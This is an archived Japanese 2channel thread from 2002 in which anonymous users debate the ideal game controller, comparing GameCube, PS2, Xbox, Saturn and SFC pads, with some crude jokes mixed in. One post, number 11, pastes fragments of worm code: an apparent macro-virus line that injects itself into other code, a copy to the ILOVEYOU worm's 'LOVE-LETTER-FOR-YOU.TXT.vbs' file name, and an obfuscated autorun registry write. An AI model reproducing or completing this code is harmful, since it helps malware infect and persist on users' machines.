2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

コントローラーの理想形を真顔で考えるスレ

1 :名無しさん必死だな:02/08/14 17:10 ID:+fzvzlmH
現在いろいろなコントローラーが出ています。
コントローラーはゲームと人間を繋ぐ唯一の
インターフェースであります。
ここで自分が考える理想のコントローラーを紹介する。
まずは今現在出ている中でいいと思うのがGCの
コントローラー。特に配置は文句無しである。
十字キーに少々難点があるが80点くらいと高得点である。
とりあえずGC2、PS3のコントローラーに期待せざるを得ない
わけだがちょっと自分が思った点を上げる。
PS2のコントローラーは無難だが何かが物足りない。
そこでまずPS3として、アナログスティックを小さくしてほしい。
そして十字キー、ボタンそれぞれ右上、左上によせて使いやすく
してほしい。DS2で言うならSONYのSの字とYの字くらいに移動する
のが望ましい。そしてスタート、セレクトボタンをアナログスティック
に当たらないように上に移動すると良い。そして一番も問題は十字キー。
これはまず十字キーの押す面積を大幅に広めてほしい。でもそうすると
押しにくくなる、そこで高さの幅をペラペラに薄めて外側がそり上がる
ようにカーブさせれば申し分無い、そのとき十字キーの材質は柔らかい
ものが好ましい。
コントローラーも次世代コントローラーでなければいけない。
今や時代はスリム+フィット感の時代!さぁ理想のコントローラーを
真顔に語ろうではないか!尚今までに出ているコントローラーの話は
控えめにしてコントローラーの理想系を考えてみることにする。

2 :名無しさん必死だな:02/08/14 17:10 ID:ELEjfyl3
わ−い

3 :ごんちゃん:02/08/14 17:11 ID:xxoD65DB
3333333333

4 : ◆mxtmsxn. :02/08/14 17:13 ID:CqPiUfbi
最終的にコントローラーは無くなると思う。
将来、ゲームは脳に接続してプレイするんじゃないかな。

5 :名無しさん必死だな:02/08/14 17:13 ID:xobuybcg
箱のパッドは無視ですか…?

6 :名無しさん必死だな:02/08/14 17:15 ID:JMMyDqKn
これからは省スペース化の時代
コントローラーは本体と一体型になると思う

7 :ゲームドキュン:02/08/14 17:16 ID:Ipq35lGW
セガハードのコントローラは防水加工でチンチンを優しく包んでくれる
材質・形をしてるのが理想。

8 :名無しさん必死だな:02/08/14 17:17 ID:NfusFOGG
やはりコントローラーというものは普段、何気なく使っているものからの
転用を考えた方がいいと考えられる。人間工学的に模索、研究されたコントローラーこそが
究極のコントローラーといえよう。
その究極のコントローラーが万人に広く求められる操作性、フィット感を持ち合わせたものと言えば。
俺はチンコしか思い浮かばない。
とどのつまり次世代コントローラーの形はチンコの形なのである。
これは自然の流れといっても過言ではないだろう。



9 :ごんちゃん:02/08/14 17:18 ID:xxoD65DB
速やかに移動願います

http://game.2ch.net/test/read.cgi/ghard/1022130042/


10 :名無しさん必死だな:02/08/15 00:26 ID:Z4wn/W3N
>>8
人間工学的なんたらの宣伝文句の商品は意外と使いにくいという罠

11 :名無しさん必死だな:02/08/15 00:27 ID:ejyIh4us
精神病院に逝け。
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))



12 :名無しさん必死だな:02/08/15 00:30 ID:Z4wn/W3N
>>9
既存のコントローラーの話題ばかりですな

13 :名無しさん必死だな :02/08/15 00:34 ID:bxlSwchl
人肌のぬくもりでシリコン製

14 :名無しさん必死だな:02/08/15 00:40 ID:Z4wn/W3N
PS3がGCのコントローラーパクったらイクナイ。

15 :名無しさん必死だな:02/08/15 01:15 ID:Z4wn/W3N
SFCはいろんな意味でいい。

16 :名無しさん必死だな:02/08/15 01:17 ID:3hM0H5kv
(^v^)この顔で考えよう。

LRボタンっていつの間にか標準になったよね。
SFCのコントローラ始めてみたときは正気かと思ったけど。

17 :名無しさん必死だな:02/08/15 02:12 ID:Z4wn/W3N
PS2のLRは2ボタンだけど人差し指だけ添えてる?または中指もいっしょに添え?

18 :名無しさん必死だな:02/08/15 02:14 ID:3hM0H5kv
中指は添えない(^v^)

19 :名無しさん必死だな:02/08/15 02:16 ID:zoV7zaEe
>>17
中指も添えると指がつるから、人差し指だけ

20 :名無しさん必死だな:02/08/15 02:52 ID:NjL013d/
>>17
(´-`).。oO( 人差し指だけを1と2の間に挟むように添えてるな )

21 :名無しさん必死だな:02/08/15 02:53 ID:F2dMz+Rm
ゲームによって違う

22 :名無しさん必死だな:02/08/15 02:57 ID:lvySVkPS
真顔で考えると死にたくなるな。
.__________
|| // //         |
||    / ̄ ̄ ̄ ̄\ . |    / ̄ ̄ ̄ ̄\
||   (  人____) |   (          )
||     |ミ/  ー◎-◎-)|   (ヽミ        |
||    (6    ゜(_ _) )|.  ( 6)        |
||  __| ∴ ノ  3  )|  (∴ \____ノ_
|| (_/.\_____ノ |   >--(っ___□__)
|| / (   ))    ))ヽ|  (  ))     |三| ヾ
. ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄   |  ||========[]===|)
                    |_||  | ̄ ̄ ̄ ̄ ̄|
                  (_)\|三三三三三|
                   (:::::::::::::::::::::y:::::::::ノ)\
                    |:::::::::::::::::::::|:::::::::|  

23 :閑人 ◆ZELDAFHI :02/08/15 02:58 ID:UZZmaTGj
ワラタ

24 :名無しさん必死だな:02/08/15 02:59 ID:3hM0H5kv
GCコンのLRがアナログになってるのは任天堂のゲームやってる分には
良いんだけど、他社のゲームにはあまり合わない。
バイオは良かったけどね。

25 :名無しさん必死だな:02/08/15 03:10 ID:zGlAT1F9
http://www.ne.jp/asahi/hzk/kommander/con3top.html
理想形の画像

26 :名無しさん必死だな:02/08/15 03:19 ID:zKEMqQ2L
ハードメーカーがアーケードスティック、ステアリングコントローラ、
フライトシム用スティック等を発売し、
デフォルトのは当り障りの無い物を希望。
一部のゲームでは最高だが一部のゲームは話にならんとかは
付属のコントローラとしては失格。どのゲームもそこそこ出来るべき。
コントローラにゲームを合わせるなんてもってのほかだ。ネオジオか。

27 :名無しさん必死だな:02/08/15 03:21 ID:3hM0H5kv
当り障りないコントローラなんて最悪
もっと冒険せよ。

28 :名無しさん必死だな:02/08/15 03:22 ID:6jDZwKeB
単純に形状の異なるコントローラー複数出して
選ばせるわけにはいかんのか?

29 :名無しさん必死だな:02/08/15 03:26 ID:kZX318bv
>>28
イイトコ言った

30 :名無しさん必死だな:02/08/15 03:29 ID:zncMsd6h
北米版の箱のコントローラーは自分の中ではベスト。
自分の中でのコントローラー比較。
米箱>GC>PS2>日箱
だな。

31 :名無しさん必死だな:02/08/15 03:38 ID:DGdde+84
アクションの64・GC
格闘ゲームのSS
RPGのPS
基本のFC
FPS好きの自分としては64一番

32 :名無しさん必死だな:02/08/15 03:40 ID:BvrSgqvm
>>30
オレとは全く逆
だな。

33 :30:02/08/15 03:42 ID:NHZTYnTY
>>32
マジすか?
米版のコントローラー触ったことあるの?
日本のはボタンの位置がクソだと思うが……。

34 :名無しさん必死だな:02/08/15 03:44 ID:qQKRyy6L
俺、今まで同世代の奴と手の大きさを比べても俺より小さい奴居なかった。
つーか女より小さいこともシバシバ鬱・・・

35 :名無しさん必死だな:02/08/15 03:54 ID:zKEMqQ2L
64のコントローラの「持ち変え」はすごいアイデアだと思ったんだが、
GCで無くなって退化してしまったように思う。
64コンが左右中央の3つを持ち変えで3種類の操作系統を実現したが、
もし4方向なら、操作系にすると6種類使えることになり、
理想のコントローラに近づく気がする。

36 :Q&M ◆rinoaFFM :02/08/15 03:55 ID:5nvqkcvw
>>35
結局64スタイルは必要なかったんだよ
他社から出ていた64コントローラを見ても分かる通り

37 :名無しさん必死だな:02/08/15 04:09 ID:0mj3Ipqg
俺、彼女よりもウェスト細くてさぁとか、男のくせにすね毛薄くてさぁ、
とかって大抵ちょっと自慢入ってるけど
手がちいさいってほんと自慢でもなんでもないなぁ。
気に入った。

38 :名無しさん必死だな:02/08/15 04:11 ID:NHZTYnTY
俺のチンコ、彼のより小さくてさぁ。

39 :名無しさん必死だな:02/08/15 04:25 ID:RvdHaKHE
>>36
ホリのが良かったとは思わない

40 :名無しさん必死だな:02/08/15 08:27 ID:nEuqRI2B
別に今に始まった事じゃないけど…、
コントローラの収納性の悪さって変えられないものなの?
これさえクリアできれば意外にゲーム機って受け入れられると思う。
電話機並とまではいかなくとも、テレビのリモコンレベルまでいかないかな。
セガMkIIIとかはケーブルがね。あとはめにくいし。

41 :名無しさん必死だな:02/08/15 09:18 ID:ulPHcsIy
PSのコントローラはかなり糞。特にPS1。
もう慣れたけどさぁ。あの十字ボタン、なに?
それから○△□×ボタンの分かりにくさ。
俺的には、スーファミのコントローラが最高。
軽いし。機能的だし。疲れないし。

42 :名無しさん必死だな:02/08/15 09:36 ID:lTSuw4Ym
俺の理想は
・PCEの6ボタンコントローラ(形がSFCのに似てる奴)にLRをつけた形。
・DCのアスキー?が出してた6ボタンパッド(SSのに似てる奴)にLRをつけた形
・SSのコントローラのでっぱってる部分を取り除いた形。
こんな感じ、ボタン6個とLRは欲しい

43 :kalma ◆YCdRUIis :02/08/15 10:58 ID:EnQryioU
>42
PCエンジンの6ボタンコントローラは糞だろ

44 :名無しさん必死だな:02/08/15 11:42 ID:jEACe5fK
すまん。サターンパッドが最高。

45 :名無しさん必死だな:02/08/15 11:56 ID:UzLKpTB2
今の時代アナログスティックがないと駄目だろ

46 :名無しさん必死だな:02/08/15 11:58 ID:HxzT2eqF
セガサターンのパッドが最高だった。

47 :名無しさん必死だな:02/08/15 12:12 ID:87OZtX0O

サターンパッドが良いとか
6ボタンコンが良いとか言ってる人って
格ゲーする人かな?

アーケードスティックでやればイイのでわ?

48 :名無しさん必死だな:02/08/15 12:14 ID:zFy7nPrl
>>47
そのとおりですな

49 :名無しさん必死だな:02/08/15 12:23 ID:xeHKz0LY
格ゲーマーではないが、アナログ以前ならサターンパッドだな。
別に格ゲーじゃなくてもR2,L2よりは上面に6ボタンあるほうが・・・。

50 :名無しさん必死だな:02/08/15 12:38 ID:87OZtX0O

オレも未だにガングリフォンってロボシューやってるんで
6ボタンは使いやすいと言うか、それしか考えられない。
PS2のガングリブレイズって操作系どうなんだろう?

最近のゲームってそんなにボタン必要なのあるのかな?

51 :名無しさん必死だな:02/08/15 12:41 ID:HxzT2eqF
格ゲーは専用スティックでやるが
それ以外はやっぱりサターンのが良い。

52 :名無しさん必死だな:02/08/15 12:47 ID:A/2QnENO
LRのアナログがウザイがエクスボーのコントローラにサターンの6ボタンが良いな。
6ボタンの大きさは上下違うままで基本は下3ボタンで、みたいなノリで。

53 :名無しさん必死だな:02/08/15 12:49 ID:ESziK6cl
>>1
長文ウザイ。
>>1だから余計にウザイ。
つまりウザすぎる。

54 :名無しさん必死だな:02/08/15 12:54 ID:AkibRu8P
セガサターンのパッドが最高だった。

55 :名無しさん必死だな:02/08/15 13:39 ID:QIMXmCQc
>>43
PCEの6ボタンって角張ったやたらでかい奴と丸型のSFCの奴に似てる奴があって
前者は本当に糞だが後者は結構使いやすいぞ。

56 :名無しさん必死だな:02/08/15 13:42 ID:+K6djPlY
いっそのことアーケードスティックを標準にしちゃえ

57 :名無しさん必死だな:02/08/15 13:46 ID:xeHKz0LY
座らないと使えないから嫌。

58 :名無しさん必死だな:02/08/15 13:47 ID:3oa0TJ8s
>>50
>最近のゲームってそんなにボタン必要なのあるのかな?

PSのエースコンバットシリーズは飛ぶのにアナログスティックを含め、ボタン全部使うぞ
操作になれるのに個人差はあるが数時間から数日はかかる

59 :名無しさん必死だな:02/08/15 14:03 ID:87OZtX0O
>>58
3Dシュー系は多いんだネ。
アナログ・ミッション・スティックとか欲しくならない?
PS純正パッドに文句なし?

60 :名無しさん必死だな:02/08/16 00:25 ID:Yh4zZI14
PS2持った後にGC持つとフィット感が素晴らしいのが体感できる。
でもGCのコンってガッシリ持った方がいいのかゆったりがいいのか。

61 :ソヌスドリ-マ ◆5cosyTzI :02/08/16 00:26 ID:y3qt99nD
>>59
シューティングならソニー純正で何か有ったような

62 :矢尾信:02/08/16 00:31 ID:H1hVyCaT
>>47
格ゲーをプレイする全ての人間が
スティック>パッド
というわけではないのですよ。

63 :名無しさん必死だな:02/08/17 00:28 ID:9nUlucV4
デビルメイくらいやってたけどアナログスティックでかくて疲れた。
せめてGCのCスティックくらいに快適に動かしたい。

64 :名無しさん必死だな:02/08/18 01:52 ID:7nKn6u62
arara

65 :kalma ◆YCdRUIis :02/08/18 10:49 ID:gEMYJR02
>55
と言うことは俺が知ってるのは前者のみだったということか

今、PC-FXのコントローラを触ったら結構いい感じだった、方向キー以外は

>61
何とか戦記とかいうヤツ専用のスティック2本のコントローラだっけ?

66 :名無しさん必死だな:02/08/19 01:01 ID:F8nVZBik
うん?

14 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)